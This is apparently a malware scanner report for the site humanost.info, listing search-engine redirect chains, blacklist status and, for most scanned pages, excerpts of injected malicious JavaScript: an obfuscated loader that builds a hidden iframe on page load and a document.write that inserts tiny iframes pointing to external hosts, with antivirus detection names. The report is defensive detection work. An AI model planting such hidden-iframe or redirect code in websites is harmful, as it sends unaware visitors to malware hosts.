Malware Scanner report for humanost.info

Malicious/Suspicious/Total urls checked: 14/0/15

14 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "humanost.info" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious redirects: Found

The website redirects visitors from search engines to the 3rd-party URL. The chain of malicious redirects found:
->http://gabriellerosephotography.com/emas.html?h=1231920
159 websites infected. gabriellerosephotography.com is marked by Google as suspicious.
->http://just15.justhost.com/suspended.page/disabled.cgi/gabriellerosephotography.com?h=1231920
16 websites infected.

The website "humanost.info" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.

Malicious/Hidden/Total iFrames: 6/6/12

6 malicious and 6 suspicious iframes found. See details below

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=humanost.info

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Malicious/Suspicious Redirects

Request	Server response	Status
URL: http://humanost.info/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: humanost.info Referer: http://www.google.com/search?q=redirect+check1	HTTP/1.1 302 Found Connection: close Date: Sat, 10 Jan 2015 19:39:35 GMT Location: http://gabriellerosephotography.com/emas.html?h=1231920 Server: cloudflare-nginx Content-Type: text/html; charset=iso-8859-1 CF-RAY: 1a6b576b1ffa0aea-WAW Set-Cookie: __cfduid=d5bdf0af940f6cb5cb2e17b2981d65e651420918775; expires=Sun, 10-Jan-16 19:39:35 GMT; path=/; domain=.humanost.info; HttpOnly	malicious
URL: http://gabriellerosephotography.com/emas.html?h=1231920 (imitation of visitor from search engine) GET /emas.html?h=1231920 HTTP/1.1 Host: gabriellerosephotography.com Referer: http://www.google.com/search?q=redirect+check2	HTTP/1.1 302 Found Connection: close Date: Sat, 10 Jan 2015 19:39:36 GMT Location: http://just15.justhost.com/suspended.page/disabled.cgi/gabriellerosephotography.com?h=1231920 Server: Apache Content-Length: 355 Content-Type: text/html; charset=iso-8859-1	malicious

Scanned pages/files

Request	Server response	Status
http://humanost.info/	200 OK Content-Length: 14365 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var wsfl = "tluafed?igc.axqe/moc.ko-morf.ererereb//:ptth"; function sd5135GHEDF(agaga31323l) { var melm = document.getElementById("a35fdsfdsf62FFSSD"); if (typeof(melm) != "undefined" && melm!= null) {}else{ var dsdSSSWrw515312FFF = document.createElement("iframe"); dsdSSSWrw515312FFF.id = "a35fdsfdsf62FFSSD"; dsdSSSWrw515312FFF.style.width = "10px"; dsdSSSWrw515312FFF.style.height ... 722 bytes are skipped ...br/>} } try { if(window.attachEvent) { window.attachEvent("onload", SFWR64362fdhHHHHH); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); SFWR64362fdhHHHHH(); }; window.onload = newonload; } else { window.onload = SFWR64362fdhHHHHH; } } } catch(err) {} Antivirus reports: Avast JS:Iframe-EBO [Trj] Microsoft Trojan:JS/Redirector.NI Fortinet JS/Redir.MX!tr GData Script.Trojan.Agent.PGMPV4
http://humanost.info/index.php?jat3action=gzip&jatype=js&jafile=t3-assets%2Fjsbe969.js	200 OK Content-Length: 91824 Content-Type: text/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emas.html?j=1231920></iframe>'); var MooTools={version:'1.12'};function $defined(obj){return(obj!=undefined);};function $type(obj){if(!$defined(obj))return false;if(obj.htmlElement)return'element';var type=typeof obj;if(type=='object'&&obj.nodeName){switch(obj.nodeType){case 1:return'element';case 3:return(/\S/).test(obj.nodeValue)?'textnode':'whitespace';}} if(type=='object'\|\|type=='function'){switc ...[3570 bytes skipped]... Antivirus reports: AntiVir HTML/TwitScroll.B Avast JS:Iframe-AFG [Trj] Ad-Aware Trojan.Iframe.CBN Ikarus Exploit.HTML.IframeRef nProtect Trojan.Iframe.CBN Comodo TrojWare.JS.Iframe.FK Emsisoft Trojan.Iframe.CBN (B) CAT-QuickHeal HTML/Iframe.NWI K7GW Exploit ( 56deb5f70 ) McAfee-GW-Edition JS/IFrame.gen.j DrWeb JS.IFrame.480 Microsoft Exploit:HTML/IframeRef.DM Kaspersky HEUR:Trojan.Script.Generic MicroWorld-eScan Trojan.Iframe.CBN Fortinet JS/Iframe.HH!tr McAfee JS/IFrame.gen.j NANO-Antivirus Trojan.Html.TwitScroll.bklyhq F-Secure Trojan.Iframe.CBN VIPRE Malware.JS.Generic (JS) F-Prot IFrame.gen AVG HTML/Framer Norman Iframe.YR Sophos Troj/Iframe-JG GData Trojan.Iframe.CBN Symantec Trojan.Maliframe!html Commtouch IFrame.gen ESET-NOD32 JS/Iframe.HH BitDefender Trojan.Iframe.CBN Malicious iFrame found. size: 2x2 src: http://gabriellerosephotography.com/emas.html?j=1231920 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emas.html?j=1231920> Hidden iFrame found. size: 2x2 src: http://renidisc.com/oeci.html?i=1231920 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://renidisc.com/oeci.html?i=1231920>
http://humanost.info/index.php	200 OK Content-Length: 14365 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var wsfl = "tluafed?igc.axqe/moc.ko-morf.ererereb//:ptth"; function sd5135GHEDF(agaga31323l) { var melm = document.getElementById("a35fdsfdsf62FFSSD"); if (typeof(melm) != "undefined" && melm!= null) {}else{ var dsdSSSWrw515312FFF = document.createElement("iframe"); dsdSSSWrw515312FFF.id = "a35fdsfdsf62FFSSD"; dsdSSSWrw515312FFF.style.width = "10px"; dsdSSSWrw515312FFF.style.height ... 722 bytes are skipped ...br/>} } try { if(window.attachEvent) { window.attachEvent("onload", SFWR64362fdhHHHHH); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); SFWR64362fdhHHHHH(); }; window.onload = newonload; } else { window.onload = SFWR64362fdhHHHHH; } } } catch(err) {} Antivirus reports: Avast JS:Iframe-EBO [Trj] Microsoft Trojan:JS/Redirector.NI Fortinet JS/Redir.MX!tr GData Script.Trojan.Agent.PGMPV4
http://humanost.info/index.php?option=com_content&view=article&id=50&Itemid=89	200 OK Content-Length: 15415 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var wsfl = "tluafed?igc.axqe/moc.ko-morf.ererereb//:ptth"; function sd5135GHEDF(agaga31323l) { var melm = document.getElementById("a35fdsfdsf62FFSSD"); if (typeof(melm) != "undefined" && melm!= null) {}else{ var dsdSSSWrw515312FFF = document.createElement("iframe"); dsdSSSWrw515312FFF.id = "a35fdsfdsf62FFSSD"; dsdSSSWrw515312FFF.style.width = "10px"; dsdSSSWrw515312FFF.style.height ... 722 bytes are skipped ...br/>} } try { if(window.attachEvent) { window.attachEvent("onload", SFWR64362fdhHHHHH); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); SFWR64362fdhHHHHH(); }; window.onload = newonload; } else { window.onload = SFWR64362fdhHHHHH; } } } catch(err) {} Antivirus reports: Avast JS:Iframe-EBO [Trj] Microsoft Trojan:JS/Redirector.NI Fortinet JS/Redir.MX!tr GData Script.Trojan.Agent.PGMPV4
http://humanost.info/index.php?jat3action=gzip&jatype=js&jafile=t3-assets%2Fjsbe969.js&option=com_content&Itemid=89	200 OK Content-Length: 91824 Content-Type: text/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emas.html?j=1231920></iframe>'); var MooTools={version:'1.12'};function $defined(obj){return(obj!=undefined);};function $type(obj){if(!$defined(obj))return false;if(obj.htmlElement)return'element';var type=typeof obj;if(type=='object'&&obj.nodeName){switch(obj.nodeType){case 1:return'element';case 3:return(/\S/).test(obj.nodeValue)?'textnode':'whitespace';}} if(type=='object'\|\|type=='function'){switc ...[3570 bytes skipped]... Antivirus reports: AntiVir HTML/TwitScroll.B Avast JS:Iframe-AFG [Trj] Ad-Aware Trojan.Iframe.CBN Ikarus Exploit.HTML.IframeRef nProtect Trojan.Iframe.CBN Comodo TrojWare.JS.Iframe.FK Emsisoft Trojan.Iframe.CBN (B) CAT-QuickHeal HTML/Iframe.NWI K7GW Exploit ( 56deb5f70 ) McAfee-GW-Edition JS/IFrame.gen.j DrWeb JS.IFrame.480 Microsoft Exploit:HTML/IframeRef.DM Kaspersky HEUR:Trojan.Script.Generic MicroWorld-eScan Trojan.Iframe.CBN Fortinet JS/Iframe.HH!tr McAfee JS/IFrame.gen.j NANO-Antivirus Trojan.Html.TwitScroll.bklyhq F-Secure Trojan.Iframe.CBN VIPRE Malware.JS.Generic (JS) F-Prot IFrame.gen AVG HTML/Framer Norman Iframe.YR Sophos Troj/Iframe-JG GData Trojan.Iframe.CBN Symantec Trojan.Maliframe!html Commtouch IFrame.gen ESET-NOD32 JS/Iframe.HH BitDefender Trojan.Iframe.CBN Hidden iFrame found. size: 2x2 src: http://renidisc.com/oeci.html?i=1231920 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://renidisc.com/oeci.html?i=1231920> Malicious iFrame found. size: 2x2 src: http://gabriellerosephotography.com/emas.html?j=1231920 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emas.html?j=1231920>
http://humanost.info/index.php?option=com_content&view=article&id=52&Itemid=90	200 OK Content-Length: 13649 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var wsfl = "tluafed?igc.axqe/moc.ko-morf.ererereb//:ptth"; function sd5135GHEDF(agaga31323l) { var melm = document.getElementById("a35fdsfdsf62FFSSD"); if (typeof(melm) != "undefined" && melm!= null) {}else{ var dsdSSSWrw515312FFF = document.createElement("iframe"); dsdSSSWrw515312FFF.id = "a35fdsfdsf62FFSSD"; dsdSSSWrw515312FFF.style.width = "10px"; dsdSSSWrw515312FFF.style.height ... 722 bytes are skipped ...br/>} } try { if(window.attachEvent) { window.attachEvent("onload", SFWR64362fdhHHHHH); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); SFWR64362fdhHHHHH(); }; window.onload = newonload; } else { window.onload = SFWR64362fdhHHHHH; } } } catch(err) {} Antivirus reports: Avast JS:Iframe-EBO [Trj] Microsoft Trojan:JS/Redirector.NI Fortinet JS/Redir.MX!tr GData Script.Trojan.Agent.PGMPV4
http://humanost.info/index.php?jat3action=gzip&jatype=js&jafile=t3-assets%2Fjsbe969.js&option=com_content&Itemid=90	200 OK Content-Length: 91824 Content-Type: text/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emas.html?j=1231920></iframe>'); var MooTools={version:'1.12'};function $defined(obj){return(obj!=undefined);};function $type(obj){if(!$defined(obj))return false;if(obj.htmlElement)return'element';var type=typeof obj;if(type=='object'&&obj.nodeName){switch(obj.nodeType){case 1:return'element';case 3:return(/\S/).test(obj.nodeValue)?'textnode':'whitespace';}} if(type=='object'\|\|type=='function'){switc ...[3570 bytes skipped]... Antivirus reports: AntiVir HTML/TwitScroll.B Avast JS:Iframe-AFG [Trj] Ad-Aware Trojan.Iframe.CBN Ikarus Exploit.HTML.IframeRef nProtect Trojan.Iframe.CBN Comodo TrojWare.JS.Iframe.FK Emsisoft Trojan.Iframe.CBN (B) CAT-QuickHeal HTML/Iframe.NWI K7GW Exploit ( 56deb5f70 ) McAfee-GW-Edition JS/IFrame.gen.j DrWeb JS.IFrame.480 Microsoft Exploit:HTML/IframeRef.DM Kaspersky HEUR:Trojan.Script.Generic MicroWorld-eScan Trojan.Iframe.CBN Fortinet JS/Iframe.HH!tr McAfee JS/IFrame.gen.j NANO-Antivirus Trojan.Html.TwitScroll.bklyhq F-Secure Trojan.Iframe.CBN VIPRE Malware.JS.Generic (JS) F-Prot IFrame.gen AVG HTML/Framer Norman Iframe.YR Sophos Troj/Iframe-JG GData Trojan.Iframe.CBN Symantec Trojan.Maliframe!html Commtouch IFrame.gen ESET-NOD32 JS/Iframe.HH BitDefender Trojan.Iframe.CBN Hidden iFrame found. size: 2x2 src: http://renidisc.com/oeci.html?i=1231920 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://renidisc.com/oeci.html?i=1231920> Malicious iFrame found. size: 2x2 src: http://gabriellerosephotography.com/emas.html?j=1231920 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emas.html?j=1231920>
http://humanost.info/index.php?option=com_content&view=article&id=53&Itemid=92	200 OK Content-Length: 11647 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var wsfl = "tluafed?igc.axqe/moc.ko-morf.ererereb//:ptth"; function sd5135GHEDF(agaga31323l) { var melm = document.getElementById("a35fdsfdsf62FFSSD"); if (typeof(melm) != "undefined" && melm!= null) {}else{ var dsdSSSWrw515312FFF = document.createElement("iframe"); dsdSSSWrw515312FFF.id = "a35fdsfdsf62FFSSD"; dsdSSSWrw515312FFF.style.width = "10px"; dsdSSSWrw515312FFF.style.height ... 722 bytes are skipped ...br/>} } try { if(window.attachEvent) { window.attachEvent("onload", SFWR64362fdhHHHHH); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); SFWR64362fdhHHHHH(); }; window.onload = newonload; } else { window.onload = SFWR64362fdhHHHHH; } } } catch(err) {} Antivirus reports: Avast JS:Iframe-EBO [Trj] Microsoft Trojan:JS/Redirector.NI Fortinet JS/Redir.MX!tr GData Script.Trojan.Agent.PGMPV4
http://humanost.info/index.php?jat3action=gzip&jatype=js&jafile=t3-assets%2Fjsbe969.js&option=com_content&Itemid=92	200 OK Content-Length: 91824 Content-Type: text/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emas.html?j=1231920></iframe>'); var MooTools={version:'1.12'};function $defined(obj){return(obj!=undefined);};function $type(obj){if(!$defined(obj))return false;if(obj.htmlElement)return'element';var type=typeof obj;if(type=='object'&&obj.nodeName){switch(obj.nodeType){case 1:return'element';case 3:return(/\S/).test(obj.nodeValue)?'textnode':'whitespace';}} if(type=='object'\|\|type=='function'){switc ...[3570 bytes skipped]... Antivirus reports: AntiVir HTML/TwitScroll.B Avast JS:Iframe-AFG [Trj] Ad-Aware Trojan.Iframe.CBN Ikarus Exploit.HTML.IframeRef nProtect Trojan.Iframe.CBN Comodo TrojWare.JS.Iframe.FK Emsisoft Trojan.Iframe.CBN (B) CAT-QuickHeal HTML/Iframe.NWI K7GW Exploit ( 56deb5f70 ) McAfee-GW-Edition JS/IFrame.gen.j DrWeb JS.IFrame.480 Microsoft Exploit:HTML/IframeRef.DM Kaspersky HEUR:Trojan.Script.Generic MicroWorld-eScan Trojan.Iframe.CBN Fortinet JS/Iframe.HH!tr McAfee JS/IFrame.gen.j NANO-Antivirus Trojan.Html.TwitScroll.bklyhq F-Secure Trojan.Iframe.CBN VIPRE Malware.JS.Generic (JS) F-Prot IFrame.gen AVG HTML/Framer Norman Iframe.YR Sophos Troj/Iframe-JG GData Trojan.Iframe.CBN Symantec Trojan.Maliframe!html Commtouch IFrame.gen ESET-NOD32 JS/Iframe.HH BitDefender Trojan.Iframe.CBN Hidden iFrame found. size: 2x2 src: http://renidisc.com/oeci.html?i=1231920 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://renidisc.com/oeci.html?i=1231920> Malicious iFrame found. size: 2x2 src: http://gabriellerosephotography.com/emas.html?j=1231920 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emas.html?j=1231920>
http://humanost.info/index.php?option=com_content&view=article&id=54&Itemid=96	200 OK Content-Length: 13480 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var wsfl = "tluafed?igc.axqe/moc.ko-morf.ererereb//:ptth"; function sd5135GHEDF(agaga31323l) { var melm = document.getElementById("a35fdsfdsf62FFSSD"); if (typeof(melm) != "undefined" && melm!= null) {}else{ var dsdSSSWrw515312FFF = document.createElement("iframe"); dsdSSSWrw515312FFF.id = "a35fdsfdsf62FFSSD"; dsdSSSWrw515312FFF.style.width = "10px"; dsdSSSWrw515312FFF.style.height ... 722 bytes are skipped ...br/>} } try { if(window.attachEvent) { window.attachEvent("onload", SFWR64362fdhHHHHH); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); SFWR64362fdhHHHHH(); }; window.onload = newonload; } else { window.onload = SFWR64362fdhHHHHH; } } } catch(err) {} Antivirus reports: Avast JS:Iframe-EBO [Trj] Microsoft Trojan:JS/Redirector.NI Fortinet JS/Redir.MX!tr GData Script.Trojan.Agent.PGMPV4
http://humanost.info/index.php?jat3action=gzip&jatype=js&jafile=t3-assets%2Fjsbe969.js&option=com_content&Itemid=96	200 OK Content-Length: 91824 Content-Type: text/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emas.html?j=1231920></iframe>'); var MooTools={version:'1.12'};function $defined(obj){return(obj!=undefined);};function $type(obj){if(!$defined(obj))return false;if(obj.htmlElement)return'element';var type=typeof obj;if(type=='object'&&obj.nodeName){switch(obj.nodeType){case 1:return'element';case 3:return(/\S/).test(obj.nodeValue)?'textnode':'whitespace';}} if(type=='object'\|\|type=='function'){switc ...[3570 bytes skipped]... Antivirus reports: AntiVir HTML/TwitScroll.B Avast JS:Iframe-AFG [Trj] Ad-Aware Trojan.Iframe.CBN Ikarus Exploit.HTML.IframeRef nProtect Trojan.Iframe.CBN Comodo TrojWare.JS.Iframe.FK Emsisoft Trojan.Iframe.CBN (B) CAT-QuickHeal HTML/Iframe.NWI K7GW Exploit ( 56deb5f70 ) McAfee-GW-Edition JS/IFrame.gen.j DrWeb JS.IFrame.480 Microsoft Exploit:HTML/IframeRef.DM Kaspersky HEUR:Trojan.Script.Generic MicroWorld-eScan Trojan.Iframe.CBN Fortinet JS/Iframe.HH!tr McAfee JS/IFrame.gen.j NANO-Antivirus Trojan.Html.TwitScroll.bklyhq F-Secure Trojan.Iframe.CBN VIPRE Malware.JS.Generic (JS) F-Prot IFrame.gen AVG HTML/Framer Norman Iframe.YR Sophos Troj/Iframe-JG GData Trojan.Iframe.CBN Symantec Trojan.Maliframe!html Commtouch IFrame.gen ESET-NOD32 JS/Iframe.HH BitDefender Trojan.Iframe.CBN Malicious iFrame found. size: 2x2 src: http://gabriellerosephotography.com/emas.html?j=1231920 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emas.html?j=1231920> Hidden iFrame found. size: 2x2 src: http://renidisc.com/oeci.html?i=1231920 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://renidisc.com/oeci.html?i=1231920>
http://humanost.info/index.php?option=com_mailto&tmpl=component&link=af8915fe89c7026841e52f04ab52b88a30bb9cd0	200 OK Content-Length: 5330 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var wsfl = "tluafed?igc.axqe/moc.ko-morf.ererereb//:ptth"; function sd5135GHEDF(agaga31323l) { var melm = document.getElementById("a35fdsfdsf62FFSSD"); if (typeof(melm) != "undefined" && melm!= null) {}else{ var dsdSSSWrw515312FFF = document.createElement("iframe"); dsdSSSWrw515312FFF.id = "a35fdsfdsf62FFSSD"; dsdSSSWrw515312FFF.style.width = "10px"; dsdSSSWrw515312FFF.style.height ... 722 bytes are skipped ...br/>} } try { if(window.attachEvent) { window.attachEvent("onload", SFWR64362fdhHHHHH); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); SFWR64362fdhHHHHH(); }; window.onload = newonload; } else { window.onload = SFWR64362fdhHHHHH; } } } catch(err) {} Antivirus reports: Avast JS:Iframe-EBO [Trj] Microsoft Trojan:JS/Redirector.NI Fortinet JS/Redir.MX!tr GData Script.Trojan.Agent.PGMPV4
http://humanost.info/index.php?jat3action=gzip&jatype=js&jafile=t3-assets%2Fjs782f9.js&option=com_mailto	200 OK Content-Length: 80172 Content-Type: text/javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emas.html?j=1231920></iframe>'); var MooTools={version:'1.12'};function $defined(obj){return(obj!=undefined);};function $type(obj){if(!$defined(obj))return false;if(obj.htmlElement)return'element';var type=typeof obj;if(type=='object'&&obj.nodeName){switch(obj.nodeType){case 1:return'element';case 3:return(/\S/).test(obj.nodeValue)?'textnode':'whitespace';}} if(type=='object'\|\|type=='function'){switc ...[3569 bytes skipped]... Antivirus reports: AntiVir HTML/TwitScroll.B Avast JS:Iframe-AFG [Trj] Ad-Aware Trojan.Iframe.CBN Ikarus Exploit.HTML.IframeRef nProtect Trojan.Iframe.CBN Comodo TrojWare.JS.Iframe.FK Emsisoft Trojan.Iframe.CBN (B) CAT-QuickHeal HTML/Iframe.NWI K7GW Exploit ( 56deb5f70 ) McAfee-GW-Edition JS/IFrame.gen.j DrWeb JS.IFrame.480 Microsoft Exploit:HTML/IframeRef.DM Kaspersky HEUR:Trojan.Script.Generic MicroWorld-eScan Trojan.Iframe.CBN Fortinet JS/Iframe.HH!tr McAfee JS/IFrame.gen.j NANO-Antivirus Trojan.Html.TwitScroll.bklyhq F-Secure Trojan.Iframe.CBN VIPRE Malware.JS.Generic (JS) F-Prot IFrame.gen AVG HTML/Framer Norman Iframe.YR Sophos Troj/Iframe-JG GData Trojan.Iframe.CBN Symantec Trojan.Maliframe!html Commtouch IFrame.gen ESET-NOD32 JS/Iframe.HH BitDefender Trojan.Iframe.CBN Hidden iFrame found. size: 2x2 src: http://renidisc.com/oeci.html?i=1231920 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://renidisc.com/oeci.html?i=1231920> Malicious iFrame found. size: 2x2 src: http://gabriellerosephotography.com/emas.html?j=1231920 This URL is marked by Google as suspicious <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emas.html?j=1231920>
http://humanost.info/test404page.js	404 Not Found Content-Length: 331 Content-Type: text/html	clean
http://humanost.info/index.php?view=article&id=54%3A2012-04-24-23-01-28&tmpl=component&print=1&layout=default&page=&option=com_content&Itemid=96	200 OK Content-Length: 6675 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) var wsfl = "tluafed?igc.axqe/moc.ko-morf.ererereb//:ptth"; function sd5135GHEDF(agaga31323l) { var melm = document.getElementById("a35fdsfdsf62FFSSD"); if (typeof(melm) != "undefined" && melm!= null) {}else{ var dsdSSSWrw515312FFF = document.createElement("iframe"); dsdSSSWrw515312FFF.id = "a35fdsfdsf62FFSSD"; dsdSSSWrw515312FFF.style.width = "10px"; dsdSSSWrw515312FFF.style.height ... 722 bytes are skipped ...br/>} } try { if(window.attachEvent) { window.attachEvent("onload", SFWR64362fdhHHHHH); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); SFWR64362fdhHHHHH(); }; window.onload = newonload; } else { window.onload = SFWR64362fdhHHHHH; } } } catch(err) {} Antivirus reports: Avast JS:Iframe-EBO [Trj] Microsoft Trojan:JS/Redirector.NI Fortinet JS/Redir.MX!tr GData Script.Trojan.Agent.PGMPV4

Recently found suspicious websites

Malware Scanner report for humanost.info

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Malicious/Suspicious Redirects

Scanned pages/files

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools